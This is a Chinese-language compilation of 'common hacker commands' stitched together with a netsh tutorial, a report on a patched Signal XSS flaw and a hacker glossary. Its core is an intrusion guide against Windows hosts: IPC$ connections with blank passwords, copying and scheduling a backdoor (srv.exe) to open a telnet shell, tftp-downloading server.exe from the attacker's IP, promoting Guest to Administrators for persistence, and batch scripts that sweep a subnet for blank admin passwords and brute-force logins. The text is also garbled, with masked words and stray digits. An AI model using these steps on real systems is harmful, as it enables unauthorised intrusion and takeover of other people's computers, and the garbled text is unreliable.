黑客常用命令大全

　　net user heibai lovechina /add 加一个heibai的用户密码为lovechina

　　net localgroup Administrators heibai /add 把他加入Administrator组

　　net start telnet 开对方的TELNET服务

　　net use z:\127.0.0.1c$ 映射对方的C盘

　　net use \\ip\ipc$ " " /user:" " 建立IPC空链接

　　net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

　　net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:

　　net use h: \\ip\c$ 登陆后映射对方C：到本地为H:

　　net use \\ip\ipc$ /del 删除IPC链接

　　net use h: /del 删除映射对方到本地的为H:的映射

　　net user 用户名　密码　/add 建立用户

　　net user 查看有哪些用户

　　net user 帐户名 查看帐户的属性

　　net user guest /active:yes 将Guest用户激活

　　net user guest lovechina 把guest的密码改为lovechina

　　net user 用户名 /delete 删掉用户

　　net user guest/time:m-f,08:00-17:00 表示guest用户登录时间为周一至周 五的net user guest/time:m,4am-5pm;t,1pm-3pm;w-f,8:00-17:00 表示guest用户登录时间为周一4:00/17:00,周二13:00/15:00,周三至周五8:00/17:00.

　　net user guest/time:all表示没有时间限制.

　　net user guest/time 表示guest用户永远不能登录. 但是只能限制登陆时间，不是上网时间

　　net time \\127.0.0.1 得到对方的时间，

　　get c:\index.htm d:\ 上传的文件是INDEX.HTM，它位于C:\下，传到对方D:\

　　copy index.htm \\127.0.0.1\c$\index.htm 本地C盘下的index.htm复制到127.0.0.1的C盘

　　net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数

　　net start 查看开启了哪些服务

　　net start 服务名　 开启服务；(如:net start telnet， net start schedule)

　　net stop 服务名 停止某服务

　　net time \\目标ip 查看对方时间

　　net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享

　　net view \\ip 查看对方局域网内开启了哪些共享

　　net config 显示系统 *** 设置

　　net logoff 断开连接的共享

　　net pause 服务名 暂停某服务

　　net send ip "文本信息" 向对方发信息

　　net ver 局域网内正在使用的 *** 连接类型和信息

　　net share 查看本地开启的共享

　　net share ipc$ 开启ipc$共享

　　net share ipc$ /del 删除ipc$共享

　　net share c$ /del 删除C：共享

　　net user guest 12345 用guest用户登陆后用将密码改为12345

　　net password 密码 更改系统登陆密码

　　netstat -a 查看开启了哪些端口,常用netstat -an

　　netstat -n 查看端口的 *** 连接情况，常用netstat -an

　　netstat -v 查看正在进行的工作

　　netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）

　　netstat -s 查看正在使用的所有协议使用情况

　　nbtsta* -* ** 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写

　　tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

　　ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。

　　ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

　　ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息

　　tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

　　kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

　　del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

　　del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）

　　move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

　　fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令

　　at id号 开启已注册的某个计划任务

　　at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止

　　at id号 /delete 停止某个已注册的计划任务

　　at 查看所有的计划任务

　　at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

　　finger username @host 查看最近有哪些用户登陆

　　telnet ip 端口 远和登陆服务器,默认端口为23

　　open ip 连接到IP（属telnet登陆后的命令）

　　telnet 在本机上直接键入telnet 将进入本机的telnet

　　copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件

　　copy c:\srv.exe $">\\ip\admin$ 复制本地c:\srv.exe到对方的admin下

　　cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件

　　copy $\svv.exe">\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：

　　xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件

　　tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送

　　tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机

　　ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)

　　route print 显示出IP路由，将主要显示 *** 地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface

　　arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

　　start 程序名或命令 /max 或/min 新开一个新窗口并更大化（最小化）运行某程序或命令

　　mem 查看cpu使用情况

　　attrib 文件名(目录名) 查看某文件（目录）的属性

　　attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性

　　dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间

　　date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间

　　set 指定环境变量名称=要指派给变量的字符 设置环境变量

　　set 显示当前所有的环境变量

　　set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量

　　pause 暂停批处理程序，并显示出：请按任意键继续....

　　if 在批处理程序中执行条件处理（更多说明见if命令及变量）

　　goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）

　　call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /）

　　for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）

　　echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置

　　echo 信息 在屏幕上显示出信息

　　echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中

　　findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello

　　find 文件名 查找某文件

　　title 标题名字 更改CMD窗口标题名字

　　color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白

　　prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )

　　print 文件名 打印文本文件

　　ver 在DOS窗口下显示版本信息

　　winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）

　　format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS

　　md　目录名 创建目录

　　replace 源文件　要替换文件的目录 替换文件

　　ren 原文件名　新文件名 重命名文件名

　　tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称

　　type 文件名 显示文本文件的内容

　　more 文件名 逐屏显示输出文件

　　doskey 要锁定的命令＝字符

　　doskey 要解锁命令=为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=

　　taskmgr 调出任务管理器

　　chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误

　　tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口

　　exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe

　　path 路径\可执行文件的文件名 为可执行文件设置一个路径。

　　cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /

　　regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；

　　regedit /e 注册表文件名 导出注册表

　　cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D: est.txt /D pub 设定d: est.txt拒绝pub用户访问。

　　cacls 文件名 查看文件的访问用户权限列表

　　REM 文本内容 在批处理文件中添加注解

　　netsh 查看或更改本地 *** 配置情况

　　IIS服务命令：

　　iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）

　　iisreset /start或stop 启动（停止）所有Internet服务

　　iisreset /restart 停止然后重新启动所有Internet服务

　　iisreset /status 显示所有Internet服务状态

　　iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动

　　iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机

　　iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务

　　iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。

　　FTP 命令： (后面有详细说明内容)

　　ftp的命令行格式为:

　　ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。

　　－d 使用调试方式。

　　－n 限制ftp的自动登录,即不使用.netrc文件。

　　－g 取消全局文件名。

　　help [命令] 或 ？[命令] 查看命令说明

　　bye 或 quit 终止主机FTP进程,并退出FTP管理方式.

　　pwd 列出当前远端主机目录

　　put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中

　　get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中

　　mget [remote-files] 从远端主机接收一批文件至本地主机

　　mput local-files 将本地主机中一批文件传送至远端主机

　　dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件

　　ascii 设定以ASCII方式传送文件(缺省值)

　　bin 或 image 设定以二进制方式传送文件

　　bell 每完成一次文件传送,报警提示

　　cdup 返回上一级目录

　　close 中断与远程服务器的ftp会话(与open对应)

　　open host[port] 建立指定ftp服务器连接,可指定连接端口

　　delete 删除远端主机中的文件

　　mdelete [remote-files] 删除一批文件

　　mkdir directory-name 在远端主机中建立目录

　　rename [from] [to] 改变远端主机中的文件名

　　rmdir directory-name 删除远端主机中的目录

　　status 显示当前FTP的状态

　　system 显示远端主机系统类型

　　user user-name [password] [account] 重新以别的用户名登录远端主机

　　open host [port] 重新建立一个新的连接

　　prompt 交互提示模式

　　macdef 定义宏命令

　　lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录

　　chmod 改变远端主机的文件权限

　　case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母

　　cd remote－dir 进入远程主机目录

　　cdup 进入远程主机目录的父目录

　　! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip

　　MYSQL 命令：

　　mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。

　　（例：mysql -h110.110.110.110 -Uroot -P123456

　　注:u与root可以不用加空格，其它也一样）

　　exit 退出MYSQL

　　mysqladmin -u用户名 -p旧密码 password 新密码 修改密码

　　grant select on 数据库.* to 用户名@登录主机 identified by "密码"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）

　　show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。

　　use mysql；

　　show tables; 显示库中的数据表

　　describe 表名; 显示数据表的结构

　　create database 库名; 建库

　　use 库名；

　　create table 表名 (字段设定列表)； 建表

　　drop database 库名;

　　drop table 表名； 删库和删表

　　delete from 表名; 将表中记录清空

　　select * from 表名; 显示表中的记录

　　mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的\\mysql\\bin目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。

　　win2003系统下新增命令（实用部份）：

　　shutdown /参数 关闭或重启本地或远程主机。

　　参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。

　　例：shutdown /r /t 0 立即重启本地主机（无延时）

　　taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。

　　参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。

　　tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。

　　参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程。

　　Linux系统下基本命令： 要区分大小写

　　uname 显示版本信息（同win2K的 ver）

　　dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）

　　pwd 查询当前所在的目录位置

　　cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。

　　cat 文件名 查看文件内容

　　cat >abc.txt 往abc.txt文件中写上内容。

　　more 文件名 以一页一页的方式显示一个文本文件。

　　cp 复制文件

　　mv 移动文件

　　rm 文件名 删除文件，rm -a 目录名删除目录及子目录

　　mkdir 目录名 建立目录

　　rmdir 删除子目录，目录内没有文档。

　　chmod 设定档案或目录的存取权限

　　grep 在档案中查找字符串

　　diff 档案文件比较

　　find 档案搜寻

　　date 现在的日期、时间

　　who 查询目前和你使用同一台机器的人以及Login时间地点

　　w 查询目前上机者的详细资料

　　whoami 查看自己的帐号名称

　　groups 查看某人的Group

　　passwd 更改密码

　　history 查看自己下过的命令

　　ps 显示进程状态

　　kill 停止某进程

　　gcc 黑客通常用它来编译C语言写的文件

　　su 权限转换为指定使用者

　　telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。

　　ftp ftp连接上某服务器（同win2K）

　　附：批处理命令与变量

　　1：for命令及变量 基本格式：

　　FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。

　　批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的之一个值，同理：%2—%9指输入的第2-9个值；例：net use $">\\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

　　(set):指定一个或一组文件，可使用通配符，如：(D:txt)和(1 1 254)(1 -1 254),{“(1 1 254)”之一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}

　　command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开

　　command_parameters：为特定命令指定参数或命令行开关

　　IN (set)：指在(set)中取值；DO command ：指执行command

　　参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。

　　用法举例：

　　@echo off

　　echo 用法格式：test.bat *.*.* > test.txt

　　for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt

　　存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。

　　/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。

　　@echo off

　　echo 用法格式：ok.bat ip

　　FOR /F %%i IN (D:dic) DO *** b.exe %1 %%i D:\pass.dic 200

　　存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。

　　Net命令的另类用法

　　Net User命令是一个DOS命令，必须在Windows XP下的MS-DOS模式下运行，所以首先要进入MS-DOS模式：选择“开始”菜单的“附件”选项的子选项“命令提示符”，或在“开始”菜单的“运行”选项（快捷键为Win+R）中输入“cmd.exe”，进入MS-DOS模式。以下功能都基于此模式下。

　　建立一个普通新用户在MS-DOS提示符中输入如下命令：“net user john 123 /add”，回车。即可新建一个名为“John”，密码为“123”的新用户。Add参数表示新建用户。

　　值得注意的是：用户名最多可有 20 个字符，密码最多可有 127 个字符。

　　建立一个登录时间受限制的用户用以下 *** 可实现对电脑使用时间的控制。比如，需要建立一个John的用户账号，密码为“123”，登录权限从星期一到星期五的早上八点到晚上十点和双休日的晚上七点到晚上九点。

　　1. 12小时制可键入如下命令：“net user john 123 /add /times：monday-friday，8AM-10PM；saturday-sunday，7PM-9PM”，回车确定即可。

　　2. 24小时制可键入如下命令：“net user john 123 /add /times：M-F，8：00-22：00；Sa-Su，19：00-21：00”，回车确定即可。

　　值得注意的是：Time的增加值限制为1小时。对于Day值，可以用全称或缩写（即 M、T、W、Th、F、Sa、Su）。可以使用12小时或24小时时间表示法。对于12小时表示法，请使用AM、PM或A.M.、P.M.。All值表示用户始终可以登录；空值（空白）意味着用户永远不能登录。用逗号分隔日期和时间，用分号分隔日期和时间单元（例如，M，4AM-5PM；T，1PM- *** M）。指定时间时不要使用空格。

　　另外，Passwordchg：{yesno}参数可用来指定用户是否可以更改自己的密码，默认设置为 Yes.限定用户的使用时间Net User命令还可以使用参数Expires：{{mm/dd/yyyy dd/mm/yyyy mmm，dd ，yyyy} never} 使用户账号根据指定的Date过期限定用户。过期日期可以是 [mm/dd/yyyy]、[dd/mm/yyyy] 或[mmm，dd，yyyy]格式。它取决于国家（地区）代码。用户账号在指定日期开始时到期。对于月份值，可以使用数字、全称或三个字母的缩写（即Jan、Feb、Mar、Apr、May、Jun、Jul、Aug、Sep、Oct、Nov、Dec）。对于年份值，可以使用两位数或四位数；使用逗号和斜杠分隔日期的各部分；不要使用空格。

　　Netsh的使用(组图)

　　有朋友问我，“能不能在命令行下直接修改Windows2000的IP地址？”。

　　当然是可以的了。不仅可以修改IP地址，和 *** 相关的每个细节都可以用命令行方式进行配置。

　　只不过一般大家不太习惯罢了。

　　 *** 就是使用系统中提供的一个命令行工具“netsh”：

　　首先，察看自己现在的ip地址：

　　列出了两块网卡，其中接口名为“本地连接”的这块网卡配置情况：

　　使用了固定IP，其中ip地址为192.168.0.4，其他信息略（自己不会看啊）

　　好了，我们来修改这个IP

　　改成什么呢，稍微改一点点吧：

　　现在ip就是192.168.0.5了。

　　其实刚才改IP的时候并没有把命令写完整，完整的看这个：

　　一堆命令吧，现在的IP地址已经修改成10.0.0.13了。

　　当然，命令行下修改IP也可以只用1条命令

　　到这里，netsh的最最最简单的功能，命令行下修改IP地址 已经说完了

　　看到一个朋友是做网管的，管理着公司几个不同的 *** ，每次都要抱着笔记本修改成不同的ip地址、不同的子网掩码、、、其实，只要能够充分的发挥Netsh脚本的功能，就可以最快捷的修改自身的 *** 配置。

　　首先，显示一个配置脚本

　　我们进入Netsh环境，切换到interface ip环境

　　通过dump命令将当前配置情况显示了出来。

　　第二步，导出一个配置脚本

　　这样，我们就把刚才显示的配置脚本保存成了一个文件c:\interface.txt

　　第三步，复制一个脚本拷贝interface2.txt并修改它

　　原因？简单嘛，为了更方便的切换 *** 环境啊

　　注意哦，我们已经把所需要修改的ip地址、子网掩码、网关和dns做了修改。

　　最后，再把新的配置文件直接导入系统。

　　到这里，已经把 *** 配置部分修改了

　　总结：

　　通过Netsh里面的dump命令可以直接显示配置脚本。

　　而通过netsh -c interface ip dump >c:\interface.txt的方式可以导出配置脚本。

　　然后再netsh -f c:\interface.txt的方式又可以把导出的配置脚本再导回去。

　　一来一去间，就可以轻松的实现方便的修改 *** 配置。

　　Netsh里面还有很多很多命令，诸如可以进入netsh环境后，在根级目录用exec命令

　　也可以加载一个配置脚本。

　　另外还有对wins、路由、ras等 *** 服务的配置也可以通过Netsh的内置命令直接操作。

　　Windows的帮助里面都有相关的介绍。

　　

　　继eFail攻击细节泄露之后，加密通讯软件Signal的代码注入漏洞也被公开。

　　Signal已经修补了Windows和Linux程序，来自阿根廷的白帽黑客团队发现了其中的代码注入漏洞。

　　远程攻击者可能利用此漏洞，通过对收件人运行的Signal桌面应用程序注入恶意payload，攻击者只需要它们发送特制链接，不需要任何用户交互。

　　今天发布的博客文章称，这个漏洞是偶然发现的，研究人员IvánAriel Barrera Oro，Alfredo Ortega和Juliano Rizzo当时正在Signal上聊天，其中一人在URL中分享了一个XSS payload链接。出人意料的是，这个XSS被成功执行。

　　

　　XSS也称为跨站点脚本，是一种常见的攻击方式，攻击者可以将恶意代码注入到存在漏洞的Web应用程序。

　　经过大量测试研究人员发现，该漏洞存在于负责处理共享链接的功能中，攻击者可以通过iFrame，图像，视频和音频标签插入特定的HTML/JavaScript代码。

　　利用这个漏洞，攻击者甚至可以在接收者的聊天窗口注入一个表格，让他们输入敏感信息。

　　有人之前认为Signal的漏洞可以让攻击者执行命令或者获取解密密钥，其实不然。

　　研究人员发布PoC视频后不久，Signal开发人员就修复了漏洞。

　　

　　奇怪的是研究人员还发现，以前版本中存在针对此漏洞的补丁（一个用于验证URL的正则表达式函数），但它在今年4月10日发布的Signal更新中消失了。

　　不过广大用户不用担心，只要你用的是最新版，就不会有这个漏洞。

　　一 相关命令

　　建立空2113:

　　net use \\IP\ipc$ "" /user:"" (要注意5261:这一令中包含了41023个空格1653)

　　建立非空连接:

　　net use \\IP\ipc$ "用户名" /user:"密" (同样有3个空格)

　　映射默认共享:

　　net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)

　　如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

　　删除一个ipc$连接

　　net use \\IP\ipc$ /del

　　删除共享映射

　　net use c: /del 删除映射的c盘，其他盘类推

　　net use * /del 删除全部,会有提示要求按y确认

　　提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射 *** 驱动器,效果一样.

　　二 经典入侵模式

　　1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

　　这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以之一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

　　2. C:\>copy srv.exe \\127.0.0.1\admin$

　　先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

　　3. C:\>net time \\127.0.0.1

　　查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

　　4. C:\>at \\127.0.0.1 11:05 srv.exe

　　用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）

　　5. C:\>net time \\127.0.0.1

　　再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

　　6. C:\>telnet 127.0.0.1 99

　　这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

　　虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了

　　7.C:\>copy ntlm.exe \\127.0.0.1\admin$

　　用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

　　8. C:\WINNT\system32>ntlm

　　输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

　　9.Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么想做什么就做什么吧,哈哈)

　　为了以防万一,我们再把guest激活加到管理组

　　10. C:\>net user guest /active:yes

　　将对方的Guest用户激活

　　11. C:\>net user guest 1234

　　将Guest的密码改为1234,或者你要设定的密码

　　12. C:\>net localgroup administrators guest /add

　　将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机).

　　ipc$经典入侵步骤：

　　1、net use \\ip\ipc$ 密码 /user:用户名

　　2、copy 文件名 \\ip\c$

　　3、net time \\ip

　　4、at \\ip 时间 命令

　　5、入侵成功，连接你的肉鸡

　　常用的 *** 命令

　　net user 查看用户列表

　　net user 用户名 密码 /add 添加用户

　　net user 用户名 密码 更改用户密码

　　net localgroup administrators 用户名 /add 添加用户到管理组

　　net user 用户名 /delete 删除用户

　　net user 用户名 查看用户的基本情况

　　net user 用户名 /active:no 禁用该用户

　　net user 用户名 /active:yes 启用该用户

　　net share 查看计算机IPC$共享资源

　　net share 共享名 查看该共享的情况

　　net share 共享名=路径 设置共享。例如 net share c$=c:

　　net share 共享名 /delete 删除IPC$共享

　　net stop lanmanserver 关闭ipc$和默认共享依赖的服务

　　net use 查看IPC$连接情况

　　net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接

　　net use \\ip\ipc$ /del 删除一个连接

　　net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘

　　net use z: /del

　　net time \\ip 查看远程计算机上的时间

　　copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上

　　net view ip 查看计算机上的共享资源

　　at 查看自己计算机上的计划作业

　　at \\ip 查看远程计算机上的计划作业

　　at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业

　　at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业

　　at \\ip all /delete 删除远程计算机上的全部计划作业

　　at \\ip time "echo 5 > c:\t.txt" 在远程计算机上建立文本文件t.txt；

　　下面纯手打，上面是度娘给的

　　taskkill /im 进程名 停止运行

　　tasklisy 查看运行进程

　　ipconfig 查看本机IP

　　md 创建文件夹

　　rd 删除文件夹

　　echo off > .txt|exit 添加文本

　　echo 内容 >> .txt 给文本添加内容

　　copy 复制文件

　　net user 用户名 密码/add 创建一个普通账号

　　net localgroup administrators 用户名 /add 把账户加入超级用户组

　　Dos命令：需要手工在命状态下输 *** 命令。是一种面向磁盘的命令，主括目录操作类命令、磁盘操作类命令、文件操作类命令和其它命令。

　　

　　一：

　　黑客：

　　1）要有英语基础，：这是基础，每天要注意修炼。

　　2）知道常用的黑客术语，

　　3.） *** 安全术语，如tcp/ip协议，APR协议

　　4.）熟练掌握DOS命令和黑客工具，ping，netstat，net命令等，工具有远程入侵，

　　5.）主流的编程语言以及脚本。

　　（1.网页脚本,即网页代码，例如HTML,CSS,JAVAscript，asp，php，xml等

　　（2.解释型语言，即perl，python，REBOL，Ruby等，也称为脚本语言，用于和底层的操作系统沟通，效果是效率差，源代码外露，一般用于网页服务器中，不用来开发

　　软件产品。

　　（3.混合型语言，Java和c#，处于解释型和编译型之间。

　　（4.编译型语言，Java，c/c++。

　　(5.汇编语言，即最接近于硬件的语言，但是用这个语言的人少。

　　程序语言学习的顺序建议如下：

　　Javascrip->解释型语言->混和型语言->编译型语言->汇编语言。

　　书上这样给的。但是根据我们学习的安排进程，应该是

　　c语言->c++->网页脚本语言->解释型语言->混合型语言->编译型语言->汇编语言

　　肉鸡：任黑客宰割的计算机。

　　木马：表面上伪装成正常的程序，一旦运行，入侵者就会获取系统的整个控制权限。

　　网页木马：表面上伪装成普通的网页文件，或者将正常的网页文件 *** 去恶意代码，一旦访问这些 *** 文件，网页木马就会利用对方的系统或者浏览器存在的漏洞自动将木马的服务器端配置好然后下载到访问者的计算机上自动执行。

　　挂马：这个是在别人的网站文件里放网页木马，或者将代码潜入到对方的正常网页文件里，使得浏览器中马。

　　后门：当黑客控制了目标主机后，还可以在对方系统植入特定程序，或者修改某些设置。并且这些变化是从表面上很难被察觉。黑客可以使用相应的程序或者 *** 与该计算机建立连接，重新控制这台计算机。所谓后门便是小偷配置了主人家的钥匙。随时随地就可以进出主人房间不被发现。

　　IPC$

